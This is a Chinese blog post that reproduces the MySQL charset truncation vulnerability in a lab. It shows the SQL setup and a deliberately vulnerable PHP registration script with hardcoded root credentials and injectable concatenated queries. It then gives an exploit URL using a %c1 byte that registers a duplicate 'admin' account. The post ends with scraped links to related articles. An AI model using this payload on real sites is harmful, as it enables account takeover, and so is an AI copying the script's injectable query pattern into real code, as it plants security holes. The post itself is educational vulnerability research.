Mysql charset Truncation vulnerability

最新推荐文章于 2025-09-12 21:47:24 发布
原创 最新推荐文章于 2025-09-12 21:47:24 发布 · 783 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#utf-8 #mysql #character

本文只是重现了下这个漏洞,详细请参考http://www.80sec.com/mysql-charset-truncation-vulnerability.html

1. 设置数据库的编码格式:

SET character_set_client = utf8;
SET character_set_connection = utf8;
SET character_set_database = utf8;
SET character_set_results = utf8;
SET character_set_server = utf8;
显示如下: 

mysql> show variables like 'character%';
+--------------------------+----------------------------+
| Variable_name            | Value                      |
+--------------------------+----------------------------+
| character_set_client     | utf8                       |
| character_set_connection | utf8                       |
| character_set_database   | utf8                       |
| character_set_filesystem | binary                     |
| character_set_results    | utf8                       |
| character_set_server     | utf8                       |
| character_set_system     | utf8                       |
| character_sets_dir       | /usr/share/mysql/charsets/ |
+--------------------------+----------------------------+
8 rows in set (0.00 sec)

2. 创建数据库与表: 

mysql> create database my_db;
Query OK, 1 row affected (0.00 sec)

mysql> use my_db;
Database changed
mysql> show tables;
Empty set (0.00 sec)

mysql>  create table test_user (username varchar(16), password varchar(20));
Query OK, 0 rows affected (0.00 sec)

mysql> insert into test_user values('admin','123445')
    -> ;
Query OK, 1 row affected (0.00 sec)

mysql> select * from test_user;
+----------+----------+
| username | password |
+----------+----------+
| admin    | 123445   |
+----------+----------+
1 row in set (0.00 sec)

3. 访问数据库的php代码如下: 
<?php
$user=$_REQUEST['user'];
$passwd=$_REQUEST['pass'];
mysql_connect("localhost", "root", "owaspbwa") or
die("Could not connect: " . mysql_error());
mysql_select_db("my_db");
mysql_query("SET names utf8");
$result = mysql_query("SELECT * from test_user where username='$user'");
if(trim($user)=='' or strlen($user)>16){
die("Input user Invalid");
}
if(@mysql_fetch_array($result, MYSQL_NUM)) {
die("already exist");
}
else {
$sql="insert test_user values ('$user','$passwd')";
mysql_query($sql);
echo "$user register OK!";
}
mysql_free_result($result);
?>

4. 如果if(trim($user)=='' or strlen($user)>16)不是大于16,比如大于20,则可以用SQL Column Truncation Vulnerabilities来写入一个与admin相同的用户,这里因为等于16所以行不通。不过可以通过utf-8多字节编码来截断插入一个admin用户。直接用http://192.168.182.149/test/sql.php?user=admin%c1zzz&pass=qweqweqwefdfdsf来访问,因为utf-8不包含0xc1所以后面的会截断。


数据库的内容:

mysql> select * from test_user;
+--------------+-----------------+
| username     | password        |
+--------------+-----------------+
| admin        | 123445          |
| admin0xc1zzz | qweqweqwefdfdsf |
| admin        | pass2           |
| admin0xc1fd  | pass2           |
| admin        | qweqweqwefdfdsf |
+--------------+-----------------+
5 rows in set (0.00 sec)




sql注入 mysql root_使用Mysql charset 实现SQL注入
weixin_29202213的博客
02-11 97
Mysql charset Truncation vulnerabilityBy http://www.80sec.com/We found that there is a interesting feature in mysql database,when you are using utf8,gbk or other charsets.This feature may make your ap...
mysql truncated_mysql数据截断
weixin_35431719的博客
02-27 814
LengF:在看《PHP高级漏洞审核技术》认真的看了这两点,暂且记下。对于很多web应用文件在很多功能是不容许重复数据的,比如用户注册功能等。一般的应用程序对于提交注册的username和数据库里已有的username对比是不是已经有重复数据,然而我们可以通过“数据截断”等来饶过这些判断,数据库在处理时候产生截断导致插入重复数据。1) Mysql SQL Column Truncation Vul...
使用Mysql charset 实现SQL注入
阿宝
07-14 1871
Mysql charset Truncation vulnerabilityBy http://www.80sec.com/We found that there is a interesting feature in mysql database,whenyou are using utf8,gbk or other charsets.This feature may make
MySQL Truncation Vulnerabilities
weixin_30677475的博客
09-13 95
While SQL-Injection is one of the most discussed security problems in web applications other possible problems for SQL queries like overlong input are usually ignored although they can lead to all kin...
SQL Column Truncation Vulnerabilities
u011500307的专栏
04-25 907
mysql数据插入的时候,如果插入的长度超过了
java连接mysql查询字段超长_mysql由于字段太长插入时截断插入但java后台却报错
weixin_39566593的博客
02-03 965
LengF:在看《PHP高级漏洞审核技术》认真的看了这两点,暂且记下。对于很多web应用文件在很多功能是不容许重复数据的,比如用户注册功能等。一般的应用程序对于提交注册的username和数据库里已有的username对比是不是已经有重复数据,然而我们可以通过“数据截断”等来饶过这些判断,数据库在处理时候产生截断导致插入重复数据。1) Mysql SQL Column Truncation Vul...
mysql数据太长无法插入_mysql由于字段太长插入时截断插入但java后台却报错
weixin_42617406的博客
01-20 1652
LengF:在看《PHP高级漏洞审核技术》认真的看了这两点,暂且记下。对于很多web应用文件在很多功能是不容许重复数据的,比如用户注册功能等。一般的应用程序对于提交注册的username和数据库里已有的username对比是不是已经有重复数据,然而我们可以通过“数据截断”等来饶过这些判断,数据库在处理时候产生截断导致插入重复数据。1) Mysql SQL Column Truncation Vul...
【转】高级PHP应用程序漏洞审核技术
heiyeluren的blog(黑夜路人的开源世界)
08-05 4488
 作者:Ph4nt0m Security Team来源:http://www.ph4nt0m.org-a.googlepages.com/PSTZine_0x03_0x06.txt   ==Ph4nt0m Security Team== Issue 0x03, Phile
mysql由于字段太长插入时截断插入但java后台却报错
weixin_34268843的博客
01-12 793
2019独角兽企业重金招聘Python工程师标准>>> ...
php LFI漏洞的一些收集
u011500307的专栏
06-08 3357
1. LFI全称是local file include,先举个最简单的例子来说明下:
Length Extension Attack
u011500307的专栏
04-19 2948
在做plaidctf时遇到了这个,记录下吧。
burpsuit暴力破解webgoat的用户验证
u011500307的专栏
05-23 1978
1. 在用owaspbwa这个系统的时候,当你要登录
【杂类】应对 MySQL 处理短时间高并发的请求:缓存预热
2301_79816047的博客
09-09 923
​缓存预热(Cache Warm-up)​核心要点说明​​是什么​​系统启动或高峰前,​​主动加载热点数据​​到缓存的过程。​​为什么​​防止冷启动时大量请求​​穿透​​到数据库,导致数据库​​崩溃​​。​​何时做​​1. ​​系统重启后​​2. ​​每日低谷期​​(如凌晨)3. ​​已知的高并发活动前​​(如大促、秒杀)。​​怎么做​​1. ​​全量预热​​:启动时加载所有热点。2. ​​增量预热​​:定时任务更新热点。3. ​​分级预热​​:本地缓存+分布式缓存。​。
Mysql 幻读详解
最新发布
weixin_44146398的博客
09-12 694
MySQL InnoDB中的幻读问题解析:在可重复读(RR)隔离级别下,幻读指同一事务内两次查询结果集行数不一致,因其他事务插入或删除数据导致。InnoDB通过Next-Key Lock(记录锁+间隙锁)机制防止幻读,但需使用SELECT...FOR UPDATE等加锁语句才会生效。单纯快照读仍可能出现幻读,关键操作建议加锁查询或提升至SERIALIZABLE隔离级别。
基于Mysql+SpringBoot+vue框架-大创管理系统源码
acode_bg的博客
09-11 336
本文设计了一个基于B/S架构的大学生创新创业管理系统,采用SpringBoot框架和MySQL数据库开发。系统实现了项目申报、评审、中检、结项等全流程管理,包含管理员、指导老师、学生三类用户角色。通过技术可行性、经济可行性和操作可行性分析验证了系统开发的合理性。系统采用三层架构设计,具备良好的安全性和数据完整性,界面简洁易操作。数据库设计包含14张表,完整覆盖业务流程需求。该系统为高校大创项目管理提供了信息化解决方案,提高了管理效率和便捷性。
[工作表控件19] 验证规则实战:如何用正则表达式规范业务输入?
每日出拳老爷子的博客
09-10 525
明道云工作表控件通过正则表达式验证功能,有效提升企业数据准确性。自Web V6.3版本起,文本和附件字段支持定义最多5条正则表达式规则,支持条件验证和顺序匹配。该功能可应用于邮箱、身份证、车牌号等格式校验,并提供错误提示。文章总结了常用正则表达式模板、配置步骤及业务场景应用,建议结合预设模板和外部工具进行调试,实施分层提示和全面测试。这种智能校验方式比人工检查更高效可靠,有助于构建精准的数据校验系统。
MySQL到StarRocks:全量与增量同步的最佳实践
RestCloud的博客
09-11 413
本文介绍了利用ETLCloud实现MySQL到StarRocks的实时数据同步过程,涵盖数据源准备、全量与增量同步流程配置及运行验证。通过零代码方式高效集成异构系统,解决数据孤岛问题,提升企业数据一致性与分析效率。
MySQLmysql-connector-cpp使用
qq_43331089的博客
09-09 227
Client的接口文档中也没写,只能到源码中找答案了。这两种构造过程是类似的,可以看下xdevapi.h源文件中的注释。没有写多线程测试,只是写了一个简单的demo跑了下。抛出异常该如何接收和处理。代码中涉及到表的增删改查的api,可参考。上面代码需要提下的是,连接数据库的参考。当线程池中没有连接可用时,
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值